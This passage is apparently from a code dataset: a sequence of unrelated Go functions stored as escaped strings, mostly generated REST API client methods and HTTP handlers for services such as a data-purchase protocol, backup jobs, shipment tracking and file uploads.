r.ctx.Value(ContextAPIKeys).(map[string]APIKey); ok {\n\t\t\tif auth, ok := auth[\"Authorization\"]; ok {\n\t\t\t\tvar key string\n\t\t\t\tif auth.Prefix != \"\" {\n\t\t\t\t\tkey = auth.Prefix + \" \" + auth.Key\n\t\t\t\t} else {\n\t\t\t\t\tkey = auth.Key\n\t\t\t\t}\n\t\t\t\tlocalVarHeaderParams[\"Authorization\"] = key\n\t\t\t}\n\t\t}\n\t}\n\tif r.ctx != nil {\n\t\t// API Key Authentication\n\t\tif auth, ok := r.ctx.Value(ContextAPIKeys).(map[string]APIKey); ok {\n\t\t\tif auth, ok := auth[\"Authorization\"]; ok {\n\t\t\t\tvar key string\n\t\t\t\tif auth.Prefix != \"\" {\n\t\t\t\t\tkey = auth.Prefix + \" \" + auth.Key\n\t\t\t\t} else {\n\t\t\t\t\tkey = auth.Key\n\t\t\t\t}\n\t\t\t\tlocalVarHeaderParams[\"Authorization\"] = key\n\t\t\t}\n\t\t}\n\t}\n\treq, err := r.apiService.client.prepareRequest(r.ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := r.apiService.client.callAPI(req)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v InlineResponse2007\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = r.apiService.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func BobPurchaseDataAPIHandler(w http.ResponseWriter, r *http.Request) {\n\tLog := Logger.NewSessionLogger()\n\n\tLog.Infof(\"start purchase data...\")\n\tvar plog PodLog\n\tplog.Result = LOG_RESULT_FAILED\n\tplog.Operation = LOG_OPERATION_TYPE_BOB_TX\n\tdefer func() {\n\t\terr := insertLogToDB(plog)\n\t\tif err != nil {\n\t\t\tLog.Warnf(\"insert log error! %v\", err)\n\t\t\treturn\n\t\t}\n\t\tnodeRecovery(w, Log)\n\t}()\n\n\trequestData := r.FormValue(\"request_data\")\n\tvar data RequestData\n\terr := json.Unmarshal([]byte(requestData), &data)\n\tif err != nil {\n\t\tLog.Warnf(\"invalid parameter. data=%v, err=%v\", requestData, err)\n\t\tfmt.Fprintf(w, RESPONSE_INCOMPLETE_PARAM)\n\t\treturn\n\t}\n\tLog.Debugf(\"success to parse request data. data=%v\", requestData)\n\n\tif data.MerkleRoot == \"\" || data.AliceIP == \"\" || data.AliceAddr == \"\" || data.BulletinFile == \"\" || data.PubPath == \"\" {\n\t\tLog.Warnf(\"invalid parameter. merkleRoot=%v, AliceIP=%v, AliceAddr=%v, bulletinFile=%v, PubPath=%v\",\n\t\t\tdata.MerkleRoot, data.AliceIP, data.AliceAddr, data.BulletinFile, data.PubPath)\n\t\tfmt.Fprintf(w, RESPONSE_INCOMPLETE_PARAM)\n\t\treturn\n\t}\n\tLog.Debugf(\"read parameters. merkleRoot=%v, AliceIP=%v, AliceAddr=%v, bulletinFile=%v, PubPath=%v\",\n\t\tdata.MerkleRoot, data.AliceIP, data.AliceAddr, data.BulletinFile, data.PubPath)\n\n\tplog.Detail = fmt.Sprintf(\"merkleRoot=%v, AliceIP=%v, AliceAddr=%v, bulletinFile=%v, PubPath=%v\",\n\t\tdata.MerkleRoot, data.AliceIP, data.AliceAddr, data.BulletinFile, data.PubPath)\n\n\tbulletin, err := readBulletinFile(data.BulletinFile, Log)\n\tif err != nil {\n\t\tLog.Warnf(\"failed to read bulletin File. err=%v\", err)\n\t\tfmt.Fprintf(w, RESPONSE_PURCHASE_FAILED)\n\t\treturn\n\t}\n\tplog.Detail = fmt.Sprintf(\"%v, merkle root=%v,\", plog.Detail, bulletin.SigmaMKLRoot)\n\n\tLog.Debugf(\"step0: prepare for transaction...\")\n\tvar params = BobConnParam{data.AliceIP, data.AliceAddr, bulletin.Mode, data.SubMode, data.OT, data.UnitPrice, \"\", bulletin.SigmaMKLRoot}\n\tnode, conn, params, err := preBobConn(params, ETHKey, Log)\n\tif err != nil {\n\t\tLog.Warnf(\"failed to prepare net for transaction. err=%v\", err)\n\t\tfmt.Fprintf(w, RESPONSE_PURCHASE_FAILED)\n\t\treturn\n\t}\n\tdefer func() {\n\t\tif err := node.Close(); err != nil {\n\t\t\tfmt.Errorf(\"failed to close client node: %v\", err)\n\t\t}\n\t\tif err := conn.Close(); err != nil {\n\t\t\tLog.Errorf(\"failed to close connection on client side: %v\", err)\n\t\t}\n\t}()\n\tLog.Debugf(\"[%v]step0: success to establish connecting session with Alice. Alice IP=%v, Alice address=%v\", params.SessionID, params.AliceIPAddr, params.AliceAddr)\n\tplog.Detail = fmt.Sprintf(\"%v, sessionID=%v,\", plog.Detail, params.SessionID)\n\tplog.SessionId = params.SessionID\n\n\tvar tx BobTransaction\n\ttx.SessionID = params.SessionID\n\ttx.Status = TRANSACTION_STATUS_START\n\ttx.Bulletin = bulletin\n\ttx.AliceIP = params.AliceIPAddr\n\ttx.AliceAddr = params.AliceAddr\n\ttx.Mode = params.Mode\n\ttx.SubMode = params.SubMode\n\ttx.OT = params.OT\n\ttx.UnitPrice = params.UnitPrice\n\ttx.BobAddr = fmt.Sprintf(\"%v\", ETHKey.Address.Hex())\n\n\tLog.Debugf(\"[%v]step0: success to prepare for transaction...\", params.SessionID)\n\ttx.Status = TRANSACTION_STATUS_START\n\terr = insertBobTxToDB(tx)\n\tif err != nil {\n\t\tLog.Warnf(\"failed to save transaction to db for Bob. err=%v\", err)\n\t\tfmt.Fprintf(w, fmt.Sprintf(RESPONSE_TRANSACTION_FAILED, \"failed to save transaction to db for Bob.\"))\n\t\treturn\n\t}\n\n\tvar response string\n\tif tx.Mode == TRANSACTION_MODE_PLAIN_POD {\n\t\tswitch tx.SubMode {\n\t\tcase TRANSACTION_SUB_MODE_COMPLAINT:\n\t\t\tif tx.OT {\n\t\t\t\tresponse = BobTxForPOC(node, ETHKey, tx, data.Demands, data.Phantoms, data.BulletinFile, data.PubPath, Log)\n\t\t\t} else {\n\t\t\t\tresponse = BobTxForPC(node, ETHKey, tx, data.Demands, data.BulletinFile, data.PubPath, Log)\n\t\t\t}\n\t\tcase TRANSACTION_SUB_MODE_ATOMIC_SWAP:\n\t\t\tresponse = BobTxForPAS(node, ETHKey, tx, data.Demands, data.BulletinFile, data.PubPath, Log)\n\t\t}\n\t} else if tx.Mode == TRANSACTION_MODE_TABLE_POD {\n\t\tswitch tx.SubMode {\n\t\tcase TRANSACTION_SUB_MODE_COMPLAINT:\n\t\t\tif tx.OT {\n\t\t\t\tresponse = BobTxForTOC(node, ETHKey, tx, data.Demands, data.Phantoms, data.BulletinFile, data.PubPath, Log)\n\t\t\t} else {\n\t\t\t\tresponse = BobTxForTC(node, ETHKey, tx, data.Demands, data.BulletinFile, data.PubPath, Log)\n\t\t\t}\n\t\tcase TRANSACTION_SUB_MODE_ATOMIC_SWAP:\n\t\t\tresponse = BobTxForTAS(node, ETHKey, tx, data.Demands, data.BulletinFile, data.PubPath, Log)\n\t\tcase TRANSACTION_SUB_MODE_VRF:\n\t\t\tif tx.OT {\n\t\t\t\tresponse = BobTxForTOQ(node, ETHKey, tx, data.KeyName, data.KeyValue, data.PhantomKeyValue, data.BulletinFile, data.PubPath, Log)\n\t\t\t} else {\n\t\t\t\tresponse = BobTxForTQ(node, ETHKey, tx, data.KeyName, data.KeyValue, data.BulletinFile, data.PubPath, Log)\n\t\t\t}\n\t\t}\n\t}\n\tvar resp Response\n\terr = json.Unmarshal([]byte(response), &resp)\n\tif err != nil {\n\t\tLog.Warnf(\"failed to parse response. response=%v, err=%v\", response, err)\n\t\tfmt.Fprintf(w, RESPONSE_FAILED_TO_RESPONSE)\n\t\treturn\n\t}\n\tif resp.Code == \"0\" {\n\t\tplog.Result = LOG_RESULT_SUCCESS\n\t}\n\tLog.Debugf(\"[%v]the transaction finish. merkel root=%v, response=%v\", params.SessionID, bulletin.SigmaMKLRoot, response)\n\tfmt.Fprintf(w, response)\n\treturn\n}", "func (me *PROTECTIONJOBS_IMPL) CreateRunProtectionJob (\r\n id int64,\r\n body *models.ProtectionRunParameters) (error) {\r\n//validating required parameters\r\n if (body == nil){\r\n return errors.New(\"The parameter 'body' is a required parameter and cannot be nil.\")\r\n} //the endpoint path uri\r\n _pathUrl := \"/public/protectionJobs/run/{id}\"\r\n\r\n //variable to hold errors\r\n var err error = nil\r\n //process optional template parameters\r\n _pathUrl, err = apihelper.AppendUrlWithTemplateParameters(_pathUrl, map[string]interface{} {\r\n \"id\" : id,\r\n })\r\n if err != nil {\r\n //error in template param handling\r\n return err\r\n }\r\n\r\n //the base uri for api requests\r\n _queryBuilder := configuration.GetBaseURI(configuration.DEFAULT_HOST,me.config);\r\n\r\n //prepare query string for API call\r\n _queryBuilder = _queryBuilder + _pathUrl\r\n\r\n //validate and preprocess url\r\n _queryBuilder, err = apihelper.CleanUrl(_queryBuilder)\r\n if err != nil {\r\n //error in url validation or cleaning\r\n return err\r\n }\r\n if me.config.AccessToken() == nil {\r\n return errors.New(\"Access Token not set. Please authorize the client using client.Authorize()\");\r\n }\r\n //prepare headers for the outgoing request\r\n headers := map[string]interface{} {\r\n \"user-agent\" : \"cohesity-Go-sdk-6.2.0\",\r\n \"content-type\" : \"application/json; charset=utf-8\",\r\n \"Authorization\" : fmt.Sprintf(\"%s %s\",*me.config.AccessToken().TokenType, *me.config.AccessToken().AccessToken),\r\n }\r\n\r\n //prepare API request\r\n _request := unirest.Post(_queryBuilder, headers, body)\r\n //and invoke the API call request to fetch the response\r\n _response, err := unirest.AsString(_request,me.config.SkipSSL());\r\n if err != nil {\r\n //error in API invocation\r\n return err\r\n }\r\n\r\n //error handling using HTTP status codes\r\n if (_response.Code == 0) {\r\n err = apihelper.NewAPIError(\"Error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code < 200) || (_response.Code > 206) { //[200,206] = HTTP OK\r\n err = apihelper.NewAPIError(\"HTTP Response Not OK\", _response.Code, _response.RawBody)\r\n }\r\n if(err != nil) {\r\n //error detected in status code validation\r\n return err\r\n }\r\n\r\n //returning the response\r\n return nil\r\n\r\n}", "func (h *httpCloud) post(path string, req io.Reader, resp interface{}) error {\n\trequestType := \"POST\"\n\tbody, err := h.sendHTTPRequest(requestType, path, req)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"HTTP request to cloudprovider failed: %v\", err)\n\t}\n\tif body != nil && resp != nil {\n\t\tif err := json.Unmarshal(body, resp); err != nil {\n\t\t\treturn fmt.Errorf(\"POST response Unmarshal for %s failed with error: %v\\n\", path, err)\n\t\t}\n\t}\n\treturn nil\n}", "func (api *AfterShipApiV4Impl) request(method string, endpoint string,\n\tresult apiV4.Response, body interface{}) apiV4.AfterShipApiError {\n\n\tif api.Client == nil {\n\t\tapi.Client = &http.Client{}\n\t}\n\n\tbodyStr, err := json.Marshal(body)\n\tif err != nil {\n\t\treturn apiV4.AfterShipApiError{\n\t\t\tapiV4.ResponseMeta{\n\t\t\t\tapiV4.SDK_ERROR_CODE,\n\t\t\t\tfmt.Sprint(err),\n\t\t\t\t\"JSON Error\",\n\t\t\t},\n\t\t}\n\t}\n\n\treq, _ := http.NewRequest(method, apiV4.URL+endpoint, bytes.NewBuffer(bodyStr))\n\t// req, _ := http.NewRequest(method, \"http://localhost:8080/post\", bytes.NewBuffer(bodyStr))\n\treq.Header.Add(apiV4.API_KEY_HEADER_FIELD, api.ApiKey)\n\treq.Header.Add(\"Connection\", \"keep-alive\")\n\treq.Header.Add(\"aftership-sdk-go\", \"v0.1\")\n\tif body != nil {\n\t\treq.Header.Add(\"content-type\", \"application/json\")\n\t}\n\n\tresp, err := api.Client.Do(req)\n\tif err != nil {\n\t\treturn apiV4.AfterShipApiError{\n\t\t\tapiV4.ResponseMeta{\n\t\t\t\tapiV4.SDK_ERROR_CODE,\n\t\t\t\tfmt.Sprint(err),\n\t\t\t\t\"IO Error\",\n\t\t\t},\n\t\t}\n\t}\n\t//log.Print(\"X-RateLimit-Reset\", resp.Header.Get(\"X-RateLimit-Reset\"))\n\t//log.Print(\"X-RateLimit-Limit\", resp.Header.Get(\"X-RateLimit-Limit\"))\n\t//log.Print(\"X-RateLimit-Remaining\", resp.Header.Get(\"X-RateLimit-Remaining\"))\n\trateLimitReset, _ := strconv.Atoi(resp.Header.Get(\"X-RateLimit-Reset\"))\n\n\tdefer resp.Body.Close()\n\tcontents, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn apiV4.AfterShipApiError{\n\t\t\tapiV4.ResponseMeta{\n\t\t\t\tapiV4.SDK_ERROR_CODE,\n\t\t\t\tfmt.Sprint(err),\n\t\t\t\t\"IO Error\",\n\t\t\t},\n\t\t}\n\t}\n\terr = json.Unmarshal(contents, result)\n\tif err != nil {\n\t\treturn apiV4.AfterShipApiError{\n\t\t\tapiV4.ResponseMeta{\n\t\t\t\tapiV4.SDK_ERROR_CODE,\n\t\t\t\tfmt.Sprint(err),\n\t\t\t\t\"JSON Error\",\n\t\t\t},\n\t\t}\n\t}\n\tcode := result.ResponseCode().Code\n\n\t// handling rate limit error by sleeping and retrying after reset\n\tif code == 429 && api.RetryPolicy.RetryOnHittingRateLimit {\n\t\ttimeNow := time.Now().Unix()\n\t\tdur := time.Duration(int64(rateLimitReset) - timeNow) * time.Second\n\t\tlog.Println(\"Hit rate limit, Auto retry after Dur : \", dur)\n\t\tc := time.After(dur)\n\t\tfor {\n\t\t\tlog.Println(\"Retrying start \", <-c)\n\t\t\treturn api.request(method, endpoint, result, body)\n\t\t}\n\t}\n\n\tif code != 200 && code != 201 {\n\t\t// log.Print(result.ResponseCode())\n\t}\n\treturn apiV4.AfterShipApiError{\n\t\tresult.ResponseCode(),\n\t}\n}", "func PostUploadHandler(ctx *macaron.Context, log *logs.BeeLogger) (int, []byte) {\n\tnamespace := ctx.Params(\":namespace\")\n\trepository := ctx.Params(\":repository\")\n\n\tacifile := ctx.Params(\":acifile\")\n\tsignfile := fmt.Sprintf(\"%v%v\", acifile, \".asc\")\n\n\t//TODO: only for testing,pubkey will be read and saved via user management module\n\tpubkeyspath := module.GetPubkeysPath(namespace, repository)\n\tif _, err := os.Stat(pubkeyspath); err != nil {\n\t\tif err := os.MkdirAll(pubkeyspath, os.ModePerm); err != nil {\n\t\t\tlog.Error(\"[ACI API] Failed to create pubkeys path %v: %v\", pubkeyspath, err.Error())\n\n\t\t\tresult, _ := json.Marshal(map[string]string{\"message\": \"Failed to create pubkeys path\"})\n\t\t\treturn http.StatusInternalServerError, result\n\t\t}\n\t}\n\n\timageId := utils.MD5(uuid.NewV4().String())\n\timagepath := module.GetImagePath(imageId)\n\tif err := os.MkdirAll(imagepath, os.ModePerm); err != nil {\n\t\tlog.Error(\"[ACI API] Failed to create aci path %v: %v\", imagepath, err.Error())\n\n\t\tresult, _ := json.Marshal(map[string]string{\"message\": \"Failed to create aci path\"})\n\t\treturn http.StatusInternalServerError, result\n\t}\n\n\tprefix := fmt.Sprintf(\"%v://%v/ac/push/%v/%v/\", setting.ListenMode, setting.Domains, namespace, repository)\n\tendpoint := models.UploadDetails{\n\t\tACIPushVersion: \"0.0.1\", //TODO: follow ACI push spec\n\t\tMultipart: false,\n\t\tManifestURL: prefix + imageId + \"/manifest\",\n\t\tSignatureURL: prefix + imageId + \"/signature/\" + signfile,\n\t\tACIURL: prefix + imageId + \"/aci/\" + acifile,\n\t\tCompletedURL: prefix + imageId + \"/complete/\" + acifile + \"/\" + signfile,\n\t}\n\n\tresult, _ := json.Marshal(endpoint)\n\treturn http.StatusOK, result\n}", "func handler(w http.ResponseWriter, r *http.Request) {\n\tvar f interface{}\n\tbody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tfmt.Printf(\"Unable to Parse Body\")\n\t}\n\n\terr = json.Unmarshal(body, &f)\n\tif err != nil{\n\t\tfmt.Printf(\"Unable to Unmarshal request\")\n\t}\n\n\tdata := f.(map[string]interface{})\n\tfmt.Println(data[\"Type\"].(string))\n\n\tif data[\"Type\"].(string) == subConfrmType {\n\t\tsubcribeURL := data[\"SubscribeURL\"].(string)\n\t\tgo confirmSubscription(subcribeURL)\n\t} else if data[\"Type\"].(string) == notificationType {\n\t\tfmt.Println(\"Recieved this message : \", data[\"Message\"].(string))\n\t}\n\n\tfmt.Fprintf(w, \"Sucess\")\n}", "func getAPIIGC(w http.ResponseWriter, request *http.Request) {\n\n\t//request.method gives us the method selected by the client, in this api there are two methods\n\t//that are implemented GET and POST, requests made for other methods will result to an error 501\n\t//501 is an HTTP error for not implemented\n\tswitch request.Method {\n\n\tcase \"GET\":\n\t\tw.Header().Set(\"content-type\", \"application/json\")\n\n\t\tURLs := mux.Vars(request)\n\t\tif len(URLs) != 0 {\n\t\t\thttp.Error(w, \"400 - Bad Request!\", 400)\n\t\t\treturn\n\t\t}\n\n\t\ttrackIDs := make([]string, 0, 0)\n\n\t\tfor i := range IGCfiles {\n\t\t\ttrackIDs = append(trackIDs, IGCfiles[i].ID)\n\t\t}\n\n\t\tjson.NewEncoder(w).Encode(trackIDs)\n\n\tcase \"POST\":\n\t\t// Set response content-type to JSON\n\t\tw.Header().Set(\"content-type\", \"application/json\")\n\n\t\tURLt := &url{}\n\n\t\t//Url is given to the server as JSON and now we decode it to a go structure\n\t\tvar error = json.NewDecoder(request.Body).Decode(URLt)\n\t\tif error != nil {\n\t\t\thttp.Error(w, http.StatusText(400), 400)\n\t\t\treturn\n\t\t}\n\n\t\t//making a random unique ID for the track files\n\t\trand.Seed(time.Now().UnixNano())\n\n\t\ttrack, err := igc.ParseLocation(URLt.URL)\n\t\tif err != nil {\n\n\t\t\thttp.Error(w, \"Bad request!\\nMalformed URL!\", 400)\n\t\t\treturn\n\t\t}\n\n\t\tmapID = searchMap(urlMap, URLt.URL)\n\t\tinitialID = rand.Intn(100)\n\n\t\tif mapID == -1 {\n\t\t\tif findIndex(urlMap, initialID) {\n\t\t\t\tuniqueID = initialID\n\t\t\t\turlMap[uniqueID] = URLt.URL\n\n\t\t\t\tigcFile := Track{}\n\t\t\t\tigcFile.ID = strconv.Itoa(uniqueID)\n\t\t\t\tigcFile.IGCtrack = track\n\t\t\t\tIGCfiles = append(IGCfiles, igcFile)\n\t\t\t\tfmt.Fprint(w, \"{\\n\\t\\\"id\\\": \\\"\"+igcFile.ID+\"\\\"\\n}\")\n\t\t\t\treturn\n\t\t\t}\n\t\t\t\trand.Seed(time.Now().UnixNano())\n\t\t\t\tuniqueID = rand.Intn(100)\n\t\t\t\turlMap[uniqueID] = URLt.URL\n\t\t\t\tigcFile := Track{}\n\t\t\t\tigcFile.ID = strconv.Itoa(uniqueID)\n\t\t\t\tigcFile.IGCtrack = track\n\t\t\t\tIGCfiles = append(IGCfiles, igcFile)\n\t\t\t\tfmt.Fprint(w, \"{\\n\\t\\\"id\\\": \\\"\"+igcFile.ID+\"\\\"\\n}\")\n\t\t\t\treturn\n\n\t\t}\n\t\t\tuniqueID = searchMap(urlMap, URLt.URL)\n\t\t\tfmt.Fprint(w, \"{\\n\\t\\\"id\\\": \\\"\"+fmt.Sprintf(\"%d\", uniqueID)+\"\\\"\\n}\")\n\t\t\treturn\n\n\n\tdefault:\n\t\thttp.Error(w, \"This method is not implemented!\", 501)\n\t\treturn\n\n\t}\n\n}", "func Panic2Response(c *gin.Context, err error, segmentName string) {\n\tif err != nil {\n\t\tc.JSON(http.StatusInternalServerError, gin.H{\"error\": err.Error()})\n\t\tlog.Panicf(\"Panic in '%s' : %v\", segmentName, err)\n\t}\n}", "func (r apiPostCatalogsStrikethroughNotificationRequest) Execute() (BaseNotification, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodPost\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue BaseNotification\n\t)\n\n\tlocalBasePath, err := r.apiService.client.cfg.ServerURLWithContext(r.ctx, \"ManagementApiService.PostCatalogsStrikethroughNotification\")\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, GenericOpenAPIError{error: err.Error()}\n\t}\n\n\tlocalVarPath := localBasePath + \"/v1/catalogs/{applicationId}/notifications/strikethrough\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"applicationId\"+\"}\", _neturl.QueryEscape(parameterToString(r.applicationId, \"\")), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif r.body == nil {\n\t\treturn localVarReturnValue, nil, reportError(\"body is required and must be specified\")\n\t}\n\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = r.body\n\tif r.ctx != nil {\n\t\t// API Key Authentication\n\t\tif auth, ok := r.ctx.Value(ContextAPIKeys).(map[string]APIKey); ok {\n\t\t\tif auth, ok := auth[\"Authorization\"]; ok {\n\t\t\t\tvar key string\n\t\t\t\tif auth.Prefix != \"\" {\n\t\t\t\t\tkey = auth.Prefix + \" \" + auth.Key\n\t\t\t\t} else {\n\t\t\t\t\tkey = auth.Key\n\t\t\t\t}\n\t\t\t\tlocalVarHeaderParams[\"Authorization\"] = key\n\t\t\t}\n\t\t}\n\t}\n\tif r.ctx != nil {\n\t\t// API Key Authentication\n\t\tif auth, ok := r.ctx.Value(ContextAPIKeys).(map[string]APIKey); ok {\n\t\t\tif auth, ok := auth[\"Authorization\"]; ok {\n\t\t\t\tvar key string\n\t\t\t\tif auth.Prefix != \"\" {\n\t\t\t\t\tkey = auth.Prefix + \" \" + auth.Key\n\t\t\t\t} else {\n\t\t\t\t\tkey = auth.Key\n\t\t\t\t}\n\t\t\t\tlocalVarHeaderParams[\"Authorization\"] = key\n\t\t\t}\n\t\t}\n\t}\n\treq, err := r.apiService.client.prepareRequest(r.ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := r.apiService.client.callAPI(req)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v BaseNotification\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 400 {\n\t\t\tvar v ErrorResponseWithStatus\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 401 {\n\t\t\tvar v ErrorResponseWithStatus\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 404 {\n\t\t\tvar v ErrorResponseWithStatus\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = r.apiService.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func ParseCreateanewCFBNumberSetResponse(rsp *http.Response) (*CreateanewCFBNumberSetResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer rsp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &CreateanewCFBNumberSetResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 201:\n\t\tvar dest []Thenewlycreateditemorempty34\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON201 = &dest\n\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 422:\n\t\tvar dest Anerror\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON422 = &dest\n\n\t}\n\n\treturn response, nil\n}", "func (a *DefaultApiService) CreateConsumer(consumerInput Consumer) ( *http.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = strings.ToUpper(\"Post\")\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/consumers\"\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{ \"application/json\", }\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\n\t\t\"application/json\",\n\t\t}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = &consumerInput\n\tr, err := a.client.prepareRequest(nil, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t localVarHttpResponse, err := a.client.callAPI(r)\n\t if err != nil || localVarHttpResponse == nil {\n\t\t return localVarHttpResponse, err\n\t }\n\t defer 